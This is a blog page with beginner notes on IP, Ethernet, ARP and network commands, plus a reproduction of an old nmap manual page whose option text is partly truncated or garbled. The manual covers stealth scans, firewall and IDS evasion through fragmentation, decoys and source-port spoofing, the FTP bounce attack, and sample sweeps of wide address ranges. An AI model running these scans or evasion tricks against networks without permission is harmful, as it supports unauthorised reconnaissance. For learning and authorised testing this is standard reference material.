IP Basics

Overview
The Internet is a network of networks. It is built on IP – the Internet Protocol.
IP is a Network Level protocol on the OSI stack
An IP packet is carried in the payload part of the datalink layer protocol (typically Ethernet).
The IP packet also has a header and a payload
The IP header includes Source IP, Destination IP, Payload protocol type and other important control information.
Higher level (Transport level) protocols commonly used with IP are UPD, TCP and ICMP.
IP is a best-effort packet delivery system. This means that (a) it delivers each packet individually and independently, (b) it offers no guarantee that a packet will be delivered and (c) it offers no mechanism for monitoring the success or failure of a packet delivery.
Key concepts





IP: Internet Protocol

UDP: User Datagram Protocol

TCP: Transport Control Protocol

ICMP: Internet Control and Management Protocol



Important commands





ipconfig (Windows NT / Windows 98)

Use ipconfig /all to see the complete IP configuration and the MAC address for any device.


winipcfg (Windows 95)

Use winipcfg to see the complete IP configuration and the MAC address for any device.


ifconfig (UNIX)

Use ifconfig -au to see the complete IP configuration and the MAC address for all devices on the host.


ping (UNIX and Windows)

Use ping to determine whether a host with a given IP address is active somewhere on the Internet.


tcpdump (UNIX)

Use tcpdump –e host and port to view all packets meeting the specified parameters that are traveling on the network.

NOTE: You leave out the –e if you are not interested in datalink layer information and you can leave out port if you are interested in traffic on all ports.



Tips and tricks
Use ping –t under Windows to do a continuous ping.
Use ping –w

IP: Internet Protocol

The physical layer


Overview

Networks are built in layers (e.g. the OSI stack)
Each layer is independent of the others and they are interchangeable.
Ethernet resides on the OSI Datalink layer.
IP resides on the OSI Network layer.
TCP resides on the OSI Transport layer
Other protocols that can inter-operate with IP on the Datalink layer are: Token Rink, PPP, SLIP, X.25 Frame Relay etc
Each Ethernet network card has a unique address – physical address or Media Access Control (MAC) address.
An Ethernet frame (packet) consists of a header and a payload (data).
The header contains the source address, the destination address and control information.
The payload can contain data for any protocol (e.g. IP).
If the payload contains IP data, then the MAC address is mapped to the IP address using the Address Resolution Protocol (ARP).
The source (sending) host needs to determine the MAC address for a given physical address. It broadcasts an ARP "Who has address xyz" request. XYZ responds directly with "xyz (IP) = abc (MAC)". In this way the Ethernet packet can be built and physically put on the wire.
Key concepts





ARP: Address Resolution Protocol

MAC: Media Access Control

OSI: Open Systems Interconnection

IP: Internet Protocol

PPP: Point to Point Protocol

SLIP: Serial Line Internet Protocol



Important commands


ARP (Microsoft & UNIX)

Use arp –a to display all the MAC addresses a host has in its ARP tables.

Use arp –d [address] to delete a MAC address from the table.


ipconfig (Windows NT / Windows 98)

Use ipconfig /all to see the complete IP configuration and the MAC address for any device.


winipcfg (Windows 95)

Use winipcfg to see the complete IP configuration and the MAC address for any device.


ifconfig (UNIX)

Use ifconfig -au to see the complete IP configuration and the MAC address for all devices on the host.



Tips and tricks

If two hosts are in the same IP subnet then they MUST have MAC addresses for each other in their ARP tables.
The ARP table should immediately be updated with the new address when pinging another host on the same subnet.

nmap - Network exploration tool and security scanner

SYNOPSIS :
nmap [Scan Type(s)] [Options]



DESCRIPTION
Nmap is designed to allow system administrators and curi-
ous individuals to scan large networks to determine which
hosts are up and what services they are offering. nmap
supports a large number of scanning techniques such as:
UDP, TCP connect(), TCP SYN (half open), ftp proxy (bounce
attack), Reverse-ident, ICMP (ping sweep), FIN, ACK sweep,
Xmas Tree, SYN sweep, IP Protocol, and Null scan. See the
Scan Types section for more details. nmap also offers a
number of advanced features such as remote OS detection
via TCP/IP fingerprinting, stealth scanning, dynamic delay
and retransmission calculations, parallel scanning, detec-
tion of down hosts via parallel pings, decoy scanning,
port filtering detection, direct (non-portmapper) RPC
scanning, fragmentation scanning, and flexible target and
port specification.

Significant effort has been put into decent nmap perfor-
mance for non-root users. Unfortunately, many critical
kernel interfaces (such as raw sockets) require root priv-
ileges. nmap should be run as root whenever possible (not
setuid root, of course).

The result of running nmap is usually a list of interest-
ing ports on the machine(s) being scanned (if any). Nmap
always gives the port's "well known" service name (if
any), number, state, and protocol. The state is either
'open', 'filtered', or 'unfiltered'. Open means that the
target machine will accept() connections on that port.
Filtered means that a firewall, filter, or other network
obstacle is covering the port and preventing nmap from
determining whether the port is open. Unfiltered means
that the port is known by nmap to be closed and no fire-
wall/filter seems to be interfering with nmap's attempts
to determine this. Unfiltered ports are the common case
and are only shown when most of the scanned ports are in
the filtered state.

Depending on options used, nmap may also report the fol-
lowing characteristics of the remote host: OS in use, TCP
sequencability, usernames running the programs which have
bound to each port, the DNS name, whether the host is a
smurf address, and a few others.



OPTIONS
Options that make sense together can generally be com-
bined. Some options are specific to certain scan modes.
nmap tries to catch and warn the user about psychotic or



1





NMAP(1) NMAP(1)


unsupported option combinations.

If you are impatient, you can skip to the examples section
at the end, which demonstrates common usage. You can also
run nmap -h for a quick reference page listing all the
options.

SCAN TYPES

-sT TCP connect() scan: This is the most basic form of
TCP scanning. The connect() system call provided by
your operating system is used to open a connection
to every interesting port on the machine. If the
port is listening, connect() will succeed, other-
wise the port isn't reachable. One strong advantage
to this technique is that you don't need any spe-
cial privileges. Any user on most UNIX boxes is
free to use this call.

This sort of scan is easily detectable as target
host logs will show a bunch of connection and error
messages for the services which accept() the con-
nection just to have it immediately shutdown.

-sS TCP SYN scan: This technique is often referred to
as "half-open" scanning, because you don't open a
full TCP connection. You send a SYN packet, as if
you are going to open a real connection and you
wait for a response. A SYN|ACK indicates the port
is listening. A RST is indicative of a non-lis-
tener. If a SYN|ACK is received, a RST is immedi-
ately sent to tear down the connection (actually
our OS kernel does this for us). The primary advan-
tage to this scanning technique is that fewer sites
will log it. Unfortunately you need root privi-
leges to build these custom SYN packets.

-sF -sX -sN
Stealth FIN, Xmas Tree, or Null scan modes: There
are times when even SYN scanning isn't clandestine
enough. Some firewalls and packet filters watch for
SYNs to restricted ports, and programs like Synlog-
ger and Courtney are available to detect these
scans. These advanced scans, on the other hand, may
be able to pass through unmolested.

The idea is that closed ports are required to reply
to your probe packet with an RST, while open ports
must ignore the packets in question (see RFC 793 pp
64). The FIN scan uses a bare (surprise) FIN
packet as the probe, while the Xmas tree scan turns
on the FIN, URG, and PUSH flags. The Null scan
turns off all flags. Unfortunately Microsoft (like
usual) decided to completely ignore the standard



2





NMAP(1) NMAP(1)


and do things their own way. Thus this scan type
will not work against systems running Windows95/NT.
On the positive side, this is a good way to distin-
guish between the two platforms. If the scan finds
open ports, you know the machine is not a Windows
box. If a -sF,-sX,or -sN scan shows all ports
closed, yet a SYN (-sS) scan shows ports being
opened, you are probably looking at a Windows box.
This is less useful now that nmap has proper OS
detection built in. There are also a few other
systems that are broken in the same way Windows is.
They include Cisco, BSDI, HP/UX, MVS, and IRIX.
All of the above send resets from the open ports
when they should just drop the packet.

-sP Ping scanning: Sometimes you only want to know
which hosts on a network are up. Nmap can do this
by sending ICMP echo request packets to every IP
address on the networks you specify. Hosts that
respond are up. Unfortunately, some sites such as
microsoft.com block echo request packets. Thus
nmap can also send a TCP ack packet to (by default)
port 80. If we get an RST back, that machine is
up. A third technique involves sending a SYN
packet and waiting for a RST or a SYN/ACK. For
non-root users, a connect() method is used.

By default (for root users), nmap uses both the
ICMP and ACK techniques in parallel. You can
change the -P option described later.

Note that pinging is done by default anyway, and
only hosts that respond are scanned. Only use this
option if you wish to ping sweep without doing any
actual port scans.

-sU UDP scans: This method is used to determine which
UDP (User Datagram Protocol, RFC 768) ports are
open on a host. The technique is to send 0 byte
udp packets to each port on the target machine. If
we receive an ICMP port unreachable message, then
the port is closed. Otherwise we assume it is
open.

Some people think UDP scanning is pointless. I usu-
ally remind them of the recent Solaris rcpbind
hole. Rpcbind can be found hiding on an undocu-
mented UDP port somewhere above 32770. So it
doesn't matter that 111 is blocked by the firewall.
But can you find which of the more than 30,000 high
ports it is listening on? With a UDP scanner you
can! There is also the cDc Back Orifice backdoor
program which hides on a configurable UDP port on
Windows machines. Not to mention the many commonly



3





NMAP(1) NMAP(1)


vulnerable services that utilize UDP such as snmp,
tftp, NFS, etc.

Unfortunately UDP scanning is sometimes painfully
slow since most hosts impliment a suggestion in RFC
1812 (section 4.3.2.8) of limiting the ICMP error
message rate. For example, the Linux kernel (in
net/ipv4/icmp.h) limits destination unreachable
message generation to 80 per 4 seconds, with a 1/4
second penalty if that is exceeded. Solaris has
much more strict limits (about 2 messages per sec-
ond) and thus takes even longer to scan. nmap
detects this rate limiting and slows down accord-
ingly, rather than flood the network with useless
packets that will be ignored by the target machine.

As is typical, Microsoft ignored the suggestion of
the RFC and does not seem to do any rate limiting
at all on Win95 and NT machines. Thus we can scan
all 65K ports of a Windows machine very quickly.
Woop!

-sO IP protocol scans: This method is used to determine
which IP protocols are supported on a host. The
technique is to send raw IP packets without any
further protocol header to each specified protocol
on the target machine. If we receive an ICMP pro-
tocol unreachable message, then the protocol is not
in use. Otherwise we assume it is open. Note that
some hosts (AIX, HP-UX, Digital UNIX) and firewalls
may not send protocol unreachable messages. This
causes all of the protocols to appear "open".

Because the implemented technique is very similar
to UDP port scanning, ICMP rate limit might apply
too. But the IP protocol field has only 8 bits, so
at most 256 protocols can be probed which should be
possible in reasonable time anyway.

-sA ACK scan: This advanced method is usually used to
map out firewall rulesets. In particular, it can
help determine whether a firewall is stateful or
just a simple packet filter that blocks incoming
SYN packets.

This scan type sends an ACK packet (with random
looking acknowledgement/sequence numbers) to the
ports specified. If a RST comes back, the ports is
classified as "unfiltered". If nothing comes back
(or if an ICMP unreachable is returned), the port
is classified as "filtered". Note that nmap usu-
ally doesn't print "unfiltered" ports, so getting
no ports shown in the output is usually a sign that
all the probes got through (and returned RSTs).



4





NMAP(1) NMAP(1)


This scan will obviously never show ports in the
"open" state.

-sW Window scan: This advanced scan is very similar to
the ACK scan, except that it can sometimes detect
open ports as well as filtered/nonfiltered due to
an anomaly in the TCP window size reporting by some
operating systems. Systems vulnerable to this
include at least some versions of AIX, Amiga, BeOS,
BSDI, Cray, Tru64 UNIX, DG/UX, OpenVMS, Digital
UNIX, FreeBSD, HP-UX, OS/2, IRIX, MacOS, NetBSD,
OpenBSD, OpenStep, QNX, Rhapsody, SunOS 4.X,
Ultrix, VAX, and VxWorks. See the nmap-hackers
mailing list archive for a full list.

-sR RPC scan. This method works in combination with
the various port scan methods of Nmap. It takes
all the TCP/UDP ports found open and then floods
them with SunRPC program NULL commands in an
attempt to determine whether they are RPC ports,
and if so, what program and version number they
serve up. Thus you can effectively obtain the same
info as firewall (or protected by TCP wrappers).
Decoys do not currently work with RPC scan, at some
point I may add decoy support for UDP RPC scans.

-b
FTP bounce attack: An interesting "feature" of the
ftp protocol (RFC 959) is support for "proxy" ftp
connections. In other words, I should be able to
connect from evil.com to the FTP server of tar-
get.com and request that the server send a file
ANYWHERE on the internet! Now this may have worked
well in 1985 when the RFC was written. But in
today's Internet, we can't have people hijacking
ftp servers and requesting that data be spit out to
arbitrary points on the internet. As *Hobbit* wrote
back in 1995, this protocol flaw "can be used to
post virtually untraceable mail and news, hammer on
servers at various sites, fill up disks, try to hop
firewalls, and generally be annoying and hard to
track down at the same time." What we will exploit
this for is to (surprise, surprise) scan TCP ports
from a "proxy" ftp server. Thus you could connect
to an ftp server behind a firewall, and then scan
ports that are more likely to be blocked (139 is a
good one). If the ftp server allows reading from
and writing to some directory (such as /incoming),
you can send arbitrary data to ports that you do
find open (nmap doesn't do this for you though).

The argument passed to the 'b' option is the host
you want to use as a proxy, in standard URL nota-
tion. The format is:



5





NMAP(1) NMAP(1)


username:password@server:port. Everything but
server is optional. To determine what servers are
vulnerable to this attack, you can see my article
in Phrack 51. And updated version is available at
the nmap URL (http://www.insecure.org/nmap).

GENERAL OPTIONS
None of these are required but some can be quite
useful.

-P0 Do not try and ping hosts at all before scanning
them. This allows the scanning of networks that
don't allow ICMP echo requests (or responses)
through their firewall. microsoft.com is an exam-
ple of such a network, and thus you should always
use -P0 or -PT80 when portscanning microsoft.com.

-PT Use TCP "ping" to determine what hosts are up.
Instead of sending ICMP echo request packets and
waiting for a response, we spew out TCP ACK packets
throughout the target network (or to a single
machine) and then wait for responses to trickle
back. Hosts that are up should respond with a RST.
This option preserves the efficiency of only scan-
ning hosts that are up while still allowing you to
scan networks/hosts that block ping packets. For
non root users, we use connect(). To set the des-
tination port of the probe packets use -PT. The default port is 80, since this port
is often not filtered out.

-PS This option uses SYN (connection request) packets
instead of ACK packets for root users. Hosts that
are up should respond with a RST (or, rarely, a
SYN|ACK).

-PI This option uses a true ping (ICMP echo request)
packet. It finds hosts that are up and also looks
for subnet-directed broadcast addresses on your
network. These are IP addresses which are exter-
nally reachable and translate to a broadcast of
incomming IP packets to a subnet of computers.
These should be eliminated if found as they allow
for numerous denial of service attacks (Smurf is
the most common).

-PB This is the default ping type. It uses both the
ACK ( -PT ) and ICMP ( -PI ) sweeps in parallel.
This way you can get firewalls that filter either
one (but not both).

-O This option activates remote host identification
via TCP/IP fingerprinting. In other words, it uses
a bunch of techniques to detect subtleties in the



6





NMAP(1) NMAP(1)


underlying operating system network stack of the
computers you are scanning. It uses this informa-
tion to create a 'fingerprint' which it compares
with its database of known OS fingerprints (the
nmap-os-fingerprints file) to decide what type of
system you are scanning.

If Nmap is unable to guess the OS of a machine, and
conditions are good (eg at least one open port),
Nmap will provide a URL you can use to submit the
fingerprint if you know (for sure) the OS running
on the machine. By doing this you contribute to
the pool of operating systems known to nmap and
thus it will be more accurate for everyone. Note
that if you leave an IP address on the form, the
machine may be scanned when we add the fingerprint
(to validate that it works).

The -O option also enables several other tests.
One is the "Uptime" measurement, which uses the TCP
timestamp option (RFC 1323) to guess when a machine
was last rebooted. This is only reported for
machines which provide this information.

Another test enabled by -O is TCP Sequence Pre-
dictability Classification. This is a measure that
describes approximately how hard it is to establish
a forged TCP connection against the remote host.
This is useful for exploiting source-IP based trust
relationships (rlogin, firewall filters, etc) or
for hiding the source of an attack. The actual
difficulty number is based on statistical sampling
and may fluctuate. It is generally better to use
the English classification such as "worthy chal-
lenge" or "trivial joke". This is only reported in
normal output with -v.

When verbose mode (-v) is on with -O, IPID Sequence
Generation is also reported. Most machines are in
the

-I This turns on TCP reverse ident scanning. As noted
by Dave Goldsmith in a 1996 Bugtraq post, the ident
protocol (rfc 1413) allows for the disclosure of
the username that owns any process connected via
TCP, even if that process didn't initiate the con-
nection. So you can, for example, connect to the
http port and then use identd to find out whether
the server is running as root. This can only be
done with a full TCP connection to the target port
(i.e. the -sT scanning option). When -I is used,
the remote host's identd is queried for each open
port found. Obviously this won't work if the host
is not running identd.



7





NMAP(1) NMAP(1)


-f This option causes the requested SYN, FIN, XMAS, or
NULL scan to use tiny fragmented IP packets. The
idea is to split up the TCP header over several
packets to make it harder for packet filters,
intrusion detection systems, and other annoyances
to detect what you are doing. Be careful with this!
Some programs have trouble handling these tiny
packets. My favorite sniffer segmentation faulted
immediately upon receiving the first 36-byte frag-
ment. After that comes a 24 byte one! While this
method won't get by packet filters and firewalls
that queue all IP fragments (like the CON-
FIG_IP_ALWAYS_DEFRAG option in the Linux kernel),
some networks can't afford the performance hit this
causes and thus leave it disabled.

Note that I do not yet have this option working on
all systems. It works fine for my Linux, FreeBSD,
and OpenBSD boxes and some people have reported
success with other *NIX variants.

-v Verbose mode. This is a highly recommended option
and it gives out more information about what is
going on. You can use it twice for greater effect.
Use -d a couple of times if you really want to get
crazy with scrolling the screen!

-h This handy option display a quick reference screen
of nmap usage options. As you may have noticed,
this man page is not exactly a 'quick reference' :)

-oN
This logs the results of your scans in a normal
human readable form into the file you specify as an
argument.

-oX
This logs the results of your scans in XML form
into the file you specify as an argument. This
allows programs to easily capture and interpret
Nmap results. You can give the argument '-' (with-
out quotes) to shoot output into stdout (for shell
pipelines, etc). In this case normal output will
be suppressed. Watch out for error messages if you
use this (they will still go to stderr). Also note
that '-v' may cause some extra information to be
printed.

-oG
This logs the results of your scans in a grepable
form into the file you specify as an argument.
This simple format provides all the information on
one line (so you can easily grep for port or OS
information and see all the IPs. This used to be



8





NMAP(1) NMAP(1)


the preferred mechanism for programs to interact
with Nmap, but now we recommend XML output (-oX
instead). This simple format may not contain as
much information as the other formats. You can
give the argument '-' (without quotes) to shoot
output into stdout (for shell pipelines, etc). In
this case normal output will be suppressed. Watch
out for error messages if you use this (they will
still go to stderr). Also note that '-v' will
cause some extra information to be printed.

-oS
thIs l0gz th3 r3suLtS of YouR ScanZ iN a s|
A network scan that is cancelled due to control-C,
network outage, etc. can be resumed using this
option. The logfilename must be either a normal
(-oN) or machine parsable (-oM) log from the
aborted scan. No other options can be given (they
will be the same as the aborted scan). Nmap will
start on the machine after the last one success-
fully scanned in the log file.

-iL
Reads target specifications from the file specified
RATHER than from the command line. The file should
contain a list of host or network expressions
seperated by spaces, tabs, or newlines. Use a
hyphen (-) as inputfilename if you want nmap to
read host expressions from stdin (like at the end
of a pipe). See the section target specification
for more information on the expressions you fill
the file with.

-iR This option tells Nmap to generate its own hosts to
scan by simply picking random numbers :). It will
never end. This can be useful for statistical sam-
pling of the Internet to estimate various things.
If you are ever really bored, try nmap -sS -iR -p
80 to find some web servers to look at.

-p
This option specifies what ports you want to spec-
ify. For example '-p 23' will only try port 23 of
the target host(s). '-p 20-30,139,60000-' scans
ports between 20 and 30, port 139, and all ports
greater than 60000. The default is to scan all
ports between 1 and 1024 as well as any ports
listed in the services file which comes with nmap.
For IP protocol scanning (-sO), this specifies the



9





NMAP(1) NMAP(1)


protocol number you wish to scan for (0-255).

-F Fast scan mode.
Specifies that you only wish to scan for ports
listed in the services file which comes with nmap
(or the protocols file for -sO). This is obviously
much faster than scanning all 65535 ports on a
host.

-D
Causes a decoy scan to be performed which makes it
appear to the remote host that the host(s) you
specify as decoys are scanning the target network
too. Thus their IDS might report 5-10 port scans
from unique IP addresses, but they won't know which
IP was scanning them and which were innocent
decoys. While this can be defeated through router
path tracing, response-dropping, and other "active"
mechanisms, it is generally an extremely effective
technique for hiding your IP address.

Separate each decoy host with commas, and you can
optionally use 'ME' as one of the decoys to repre-
sent the position you want your IP address to be
used. If your put 'ME' in the 6th position or
later, some common port scan detectors (such as
Solar Designer's excellent scanlogd) are unlikeley
to show your IP address at all. If you don't use
'ME', nmap will put you in a random position.

Note that the hosts you use as decoys should be up
or you might accidently SYN flood your targets.
Also it will be pretty easy to determine which host
is scanning if only one is actually up on the net-
work. You might want to use IP addresses instead
of names (so the decoy networks don't see you in
their nameserver logs).

Also note that some (stupid) "port scan detectors"
will firewall/deny routing to hosts that attempt
port scans. Thus you might inadvertantly cause the
machine you scan to lose connectivity with the
decoy machines you are using. This could cause the
target machines major problems if the decoy is,
say, its internet gateway or even "localhost".
Thus you might want to be careful of this option.
The real moral of the story is that detectors of
spoofable port scans should not take action against
the machine that seems like it is port scanning
them. It could just be a decoy!

Decoys are used both in the initial ping scan
(using ICMP, SYN, ACK, or whatever) and during the
actual port scanning phase. Decoys are also used



10





NMAP(1) NMAP(1)


during remote OS detection ( -O ).

It is worth noting that using too many decoys may
slow your scan and potentially even make it less
accurate. Also, some ISPs will filter out your
spoofed packets, although many (currently most) do
not restrict spoofed IP packets at all.

-S
In some circumstances, nmap may not be able to
determine your source address ( nmap will tell you
if this is the case). In this situation, use -S
with your IP address (of the interface you wish to
send packets through).

Another possible use of this flag is to spoof the
scan to make the targets think that someone else is
scanning them. Imagine a company being repeatedly
port scanned by a competitor! This is not a sup-
ported usage (or the main purpose) of this flag. I
just think it raises an interesting possibility
that people should be aware of before they go
accusing others of port scanning them. -e would
generally be required for this sort of usage.

-e
Tells nmap what interface to send and receive pack-
ets on. Nmap should be able to detect this but it
will tell you if it cannot.

-g
Sets the source port number used in scans. Many
naive firewall and packet filter installations make
an exception in their ruleset to allow DNS (53) or
FTP-DATA (20) packets to come through and establish
a connection. Obviously this completely subverts
the security advantages of the firewall since
intruders can just masquerade as FTP or DNS by mod-
ifying their source port. Obviously for a UDP scan
you should try 53 first and TCP scans should try 20
before 53. Note that this is only a request --
nmap will honor it only if and when it is able to.
For example, you can't do TCP ISN sampling all from
one host:port to one host:port, so nmap changes the
source port even if you used -g.

Be aware that there is a small performance penalty
on some scans for using this option, because I
sometimes store useful information in the source
port number.

-n Tells Nmap to NEVER do reverse DNS resolution on
the active IP addresses it finds. Since DNS is
often slow, this can help speed things up.



11





NMAP(1) NMAP(1)


-R Tells Nmap to ALWAYS do reverse DNS resolution on
the target IP addresses. Normally this is only
done when a machine is found to be alive.

-r Tells Nmap NOT to randomize the order in which
ports are scanned.

--randomize_hosts
Tells Nmap to shuffle each group of up to 2048
hosts before it scans them. This can make the
scans less obvious to various network monitoring
systems, especially when you combine it with slow
timing options (see below).

-M
Sets the maximum number of sockets that will be
used in parallel for a TCP connect() scan (the
default). This is useful to slow down the scan a
little bit and avoid crashing remote machines.
Another approach is to use -sS, which is generally
easier for machines to handle.

TIMING OPTIONS
Generally Nmap does a good job at adjusting for
Network characteristics at runtime and scanning as
fast as possible while minimizing that chances of
hosts/ports going undetected. However, there are
same cases where Nmap's default timing policy may
not meet your objectives. The following options
provide a fine level of control over the scan tim-
ing:

-T
These are canned timing policies for conveniently
expressing your priorities to Nmap. Paranoid mode
scans very slowly in the hopes of avoiding detec-
tion by IDS systems. It serializes all scans (no
parallel scanning) and generally waits at least 5
minutes between sending packets. Sneaky is simi-
lar, except it only waits 15 seconds between send-
ing packets. Polite is meant to ease load on the
network and reduce the chances of crashing
machines. It serializes the probes and waits at
least 0.4 seconds between them. Normal is the
default Nmap behaviour, which tries to run as
quickly as possible without overloading the network
or missing hosts/ports. Aggressive mode adds a 5
minute timeout per host and it never waits more
than 1.25 seconds for probe responses. Insane is
only suitable for very fast networks or where you
don't mind losing some information. It times out
hosts in 75 seconds and only waits 0.3 seconds for
individual probes. It does allow for very quick
network sweeps though :). You can also reference



12





NMAP(1) NMAP(1)


these by number (0-5). For example, '-T 0' gives
you Paranoid mode and '-T 5' is Insane mode.

These canned timing modes should NOT be used in
combination with the lower level controls given
below.

--host_timeout
Specifies the amount of time Nmap is allowed to
spend scanning a single host before giving up on
that IP. The default timing mode has no host time-
out.

--max_rtt_timeout
Specifies the maximum amount of time Nmap is
allowed to wait for a probe response before
retransmitting or timing out that particular probe.
The default mode sets this to about 9000.

--min_rtt_timeout
When the target hosts start to establish a pattern
of responding very quickly, Nmap will shrink the
amount of time given per probe. This speeds up the
scan, but can lead to missed packets when a
response takes longer than usual. With this param-
eter you can guarantee that Nmap will wait at least
the given amount of time before giving up on a
probe.

--initial_rtt_timeout
Specifies the initial probe timeout. This is gen-
erally only useful when scanning firwalled hosts
with -P0. Normally Nmap can obtain good RTT esti-
mates from the ping and the first few probes. The
default mode uses 6000.

--max_parallelism
Specifies the maximum number of scans Nmap is
allowed to perform in parallel. Setting this to
one means Nmap will never try to scan more than 1
port at a time. It also effects other parallel
scans such as ping sweep, RPC scan, etc.

--scan_delay
Specifies the minimum amount of time Nmap must wait
between probes. This is mostly useful to reduce
network load or to slow the scan way down to sneak
under IDS thresholds.




TARGET SPECIFICATION
Everything that isn't an option (or option argument) in
nmap is treated as a target host specification. The sim-
plest case is listing single hostnames or IP addresses on



13





NMAP(1) NMAP(1)


the command line. If you want to scan a subnet of IP
addresses, you can append '/mask' to the hostname or IP
address. mask must be between 0 (scan the whole internet)
and 32 (scan the single host specified). Use /24 to scan
a class 'C' address and /16 for a class 'B'.

Nmap also has a more powerful notation which lets you
specify an IP address using lists/ranges for each element.
Thus you can scan the whole class 'B' network 192.168.*.*
by specifying '192.168.*.*' or '192.168.0-255.0-255' or
even '192.168.1-50,51-255.1,2,3,4,5-255'. And of course
you can use the mask notation: '192.168.0.0/16'. These
are all equivalent. If you use asterisks ('*'), remember
that most shells require you to escape them with back
slashes or protect them with quotes.

Another interesting thing to do is slice the Internet the
other way. Instead of scanning all the hosts in a class
specifying hosts to scan, see the examples section.



EXAMPLES
Here are some examples of using nmap, from simple and nor-
mal to a little more complex/esoteric. Note that actual
numbers and some actual domain names are used to make
things more concrete. In their place you should substi-
tute addresses/names from your own network. I do not
think portscanning other networks is illegal; nor should
portscans be construed by others as an attack. I have
scanned hundreds of thousands of machines and have
received only one complaint. But I am not a lawyer and
some (anal) people may be annoyed by nmap probes. Get
permission first or use at your own risk.

nmap -v target.example.com

This option scans all reserved TCP ports on the machine
target.example.com . The -v means turn on verbose mode.

nmap -sS -O target.example.com/24

Launches a stealth SYN scan against each machine that is
up out of the 255 machines on class 'C' where target.exam-
ple.com resides. It also tries to determine what operat-
ing system is running on each host that is up and running.
This requires root privileges because of the SYN scan and
the OS detection.

nmap -sX -p 22,53,110,143,4564 198.116.*.1-127

Sends an Xmas tree scan to the first half of each of the
255 possible 8 bit subnets in the 198.116 class 'B'
address space. We are testing whether the systems run
sshd, DNS, pop3d, imapd, or port 4564. Note that Xmas
scan doesn't work on Microsoft boxes due to their



14





NMAP(1) NMAP(1)


deficient TCP stack. Same goes with CISCO, IRIX, HP/UX,
and BSDI boxes.

nmap -v --randomize_hosts -p 80 '*.*.2.3-5'

Rather than focus on a specific IP range, it is sometimes
interesting to slice up the entire Internet and scan a
small sample from each slice. This command finds all web
servers on machines with IP addresses ending in .2.3,
.2.4, or .2.5 find more interesting machines starting at
127. so you might want to use '127-222' instead of the
first asterisks because that section has a greater density
of interesting machines (IMHO).

host -l company.com | cut '-d ' -f 4 | ./nmap -v -iL -

Do a DNS zone transfer to find the hosts in company.com
and then feed the IP addresses to nmap. The above com-
mands are for my GNU/Linux box. You may need different
commands/options on other operating systems.



BUGS
Bugs? What bugs? Send me any that you find. Patches are
nice too :) Remember to also send in new OS fingerprints
so we can grow the database. Nmap will give you a submis-
sion URL when an appropriate fingerprint is found.



AUTHOR
Fyodor



DISTRIBUTION
The newest version of nmap can be obtained from
http://www.insecure.org/nmap/

nmap is (C) 1995-2001 by Insecure.Com LLC

libpcap is also distributed along with nmap. It is copy-
righted by Van Jacobson, Craig Leres and Steven McCanne,
all of the Lawrence Berkeley National Laboratory, Univer-
sity of California, Berkeley, CA. The version distributed
with nmap may be modified, pristine sources are available
from ftp://ftp.ee.lbl.gov/libpcap.tar.Z .

This program is free software; you can redistribute it
and/or modify it under the terms of the GNU General Public
License as published by the Free Software Foundation; Ver-
sion 2. This guarantees your right to use, modify, and
redistribute Nmap under certain conditions. If this
license is unacceptable to you, Insecure.Org may be will-
ing to sell alternative licenses (contact fyodor@dhp.com).

Source is provided to this software because we believe
users have a right to know exactly what a program is going
to do before they run it. This also allows you to audit



15





NMAP(1) NMAP(1)


the software for security holes (none have been found so
far).

Source code also allows you to port Nmap to new platforms,
fix bugs, and add new features. You are highly encouraged
to send your changes to fyodor@insecure.org for possible
incorporation into the main distribution. By sending
these changes to Fyodor or one the insecure.org develop-
ment mailing lists, it is assumed that you are offering
Fyodor the unlimited, non-exclusive right to reuse, mod-
ify, and relicense the code. This is important because
the inability to relicense code has caused devastating
problems for other Free Software projects (such as KDE and
NASM). Nmap will always be available Open Source. If you
wish to specify special license conditions of your contri-
butions, just say so when you send them.

This program is distributed in the hope that it will be
useful, but WITHOUT ANY WARRANTY; without even the implied
warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the GNU General Public License for more
details (it is in the COPYING file of the nmap distribu-
tion).

It should also be noted that Nmap has been known to crash
certain poorly written applications, TCP/IP stacks, and
even operating systems. Nmap should never be run against
mission critical systems unless you are prepared to suffer
downtime. We acknowledge here that Nmap may crash your
systems or networks and we disclaim all liability for any
damage or problems Nmap could cause.

Because of the slight risk of crashes and because a few
black hats like to use Nmap for reconnaissance prior to
attacking systems, there are administrators who become
upset and may complain when their system is scanned.
Thus, it is often advisable to request permission before
doing even a light scan of a network.

Nmap should never be run with privileges (eg suid root)
for security reasons.

All versions of Nmap equal to or greater than 2.0 are
believed to be Year 2000 (Y2K) compliant in all respects.
There is no reason to believe versions earlier than 2.0
are susceptible to problems, but we have not tested them.





16



 

Subscribe in Bloglines Msn bot last visit powered by MyPagerank.Net Yahoo bot last visit powered by MyPagerank.Net
I heart FeedBurner downtime checker The Ubuntu Counter Project - user number # 31290

 
Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Powered by TadPole
FOG FLAMES